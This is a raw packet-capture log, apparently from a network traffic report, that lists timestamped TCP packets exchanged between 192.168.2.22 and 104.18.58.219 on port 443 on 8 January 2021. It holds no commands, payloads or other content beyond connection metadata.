                                                        Jan 8, 2021 09:08:17.433705091 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.433749914 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.433816910 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.434685946 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.434741974 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.434878111 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.435602903 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.435643911 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.435725927 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.436573029 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.436614990 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.436692953 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.437546968 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.437589884 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.437652111 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.438527107 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.438566923 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.438635111 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.439469099 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.439511061 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.439593077 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.440444946 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.440486908 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.440582037 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.441379070 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.441454887 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.441526890 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.442373991 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.442414999 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.442481041 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.443376064 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.443419933 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.443555117 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.444329977 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.444384098 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.444467068 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.445262909 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.445321083 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.445477962 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.446280956 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.446326017 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.446388006 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.447175980 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.447221994 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.447283983 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.448179960 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.448221922 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.448281050 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.449155092 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.449197054 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.449290037 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.450105906 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.450156927 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.450225115 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.451059103 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.451103926 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.451190948 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.452014923 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.452059031 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.452112913 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.453001976 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.453054905 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.453115940 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.454003096 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.454045057 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.454103947 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.714617014 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.714663982 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.714837074 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.714966059 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.714993000 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.715075970 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.715993881 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.716026068 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.716099977 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.716911077 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.716937065 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.717012882 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.717858076 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.717885017 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.717962980 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.718844891 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.718878031 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.718952894 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.719782114 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.719810009 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.719886065 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.720738888 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.720762968 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.720834017 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.721743107 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.721774101 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.721839905 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.722665071 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.722690105 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.722767115 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.723650932 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.723680973 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.723826885 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.724601984 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.724632978 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.724698067 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.725765944 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.725799084 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.725855112 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.726768970 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.726800919 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.726855993 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.727541924 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.727577925 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.727679014 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.728471994 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.728496075 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.728571892 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.729439020 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.729473114 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.729621887 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.730415106 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.730443954 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.730489969 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.731475115 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.731503963 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.731553078 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.732465029 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.732496023 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.732553005 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.733347893 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.733393908 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.733458042 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.734216928 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.734253883 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.734302044 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.735203028 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.735234022 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.735277891 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.736162901 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.736195087 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.736241102 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.737622976 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.737662077 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.737713099 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.738275051 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.738302946 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.738342047 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.739002943 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.739028931 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.739078999 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.740001917 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.740031004 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.740076065 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.740966082 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.740995884 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.741049051 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.741914034 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.950845957 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.971955061 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.971988916 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972009897 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972037077 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972062111 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972085953 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972106934 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972161055 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.972198009 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.972347975 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972881079 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.972908974 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.973001003 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.973443031 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.973553896 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.973645926 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.974421978 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.974447012 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.974529028 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.975192070 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.975239038 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.975295067 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.976114988 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.976134062 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.976200104 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.976999044 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.977025032 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.977092028 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.977879047 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.977910995 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.977982998 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.978825092 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.978854895 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.978912115 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.979604006 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.979634047 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.979713917 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.980484009 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.980503082 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.980561018 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.981496096 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.981515884 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.981586933 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.983993053 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.984066963 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.984138012 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.985413074 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985450983 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985476971 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985502005 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985517979 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.985527992 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985552073 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.985553026 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.985604048 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.986356020 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.986385107 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.986454964 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.987168074 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.987193108 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.987246990 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.987945080 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.987976074 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.988075018 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.988826990 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.988982916 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.989047050 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.989218950 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.989237070 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.989284039 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.990065098 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.990159988 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.990219116 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.990974903 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.991003036 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:17.991080046 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:17.991899014 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.194519997 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.194569111 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.194632053 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.194881916 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.194925070 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.194950104 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.196216106 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.196257114 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.196274042 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.196630955 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.196672916 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.196690083 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.197479010 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.197520018 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.197542906 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.198371887 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.198415995 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.198434114 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.199243069 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.199286938 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.199317932 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.200108051 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.200150013 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.200179100 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.201102972 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.201144934 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.201173067 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.201903105 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.201946020 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.201972008 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.202740908 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.202781916 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.202800035 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.203600883 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.203641891 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.203792095 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.204494953 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.204530001 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.204586029 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.205414057 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.205449104 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.205501080 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.206223011 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.206254005 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.206312895 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.207122087 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.207154989 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.207209110 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.207966089 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.207997084 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.208056927 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.208868027 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.208900928 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.208950996 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.209748030 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.209780931 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.209831953 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.210679054 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.210716963 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.210777044 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.211556911 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.211596966 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.211656094 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.212376118 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.212409973 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.212460995 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.213224888 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.213263035 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.213313103 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.214109898 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.214148045 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.214196920 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.217266083 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217298985 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217329025 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217359066 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217361927 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.217406034 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.217418909 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217461109 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217503071 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.217665911 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217699051 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.217740059 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.218622923 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.218672037 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.218863964 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.219403028 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.219448090 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.219520092 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.220247984 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.220293999 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.220355988 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.516279936 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.516360998 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.516472101 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.516628981 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.516685009 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.516747952 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.517520905 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.517579079 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.517643929 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.518351078 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.518412113 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.518471956 CET49176443192.168.2.22104.18.58.219
                                                        Jan 8, 2021 09:08:18.519256115 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.519309998 CET44349176104.18.58.219192.168.2.22
                                                        Jan 8, 2021 09:08:18.519382954 CET49176443192.168.2.22104.18.58.219
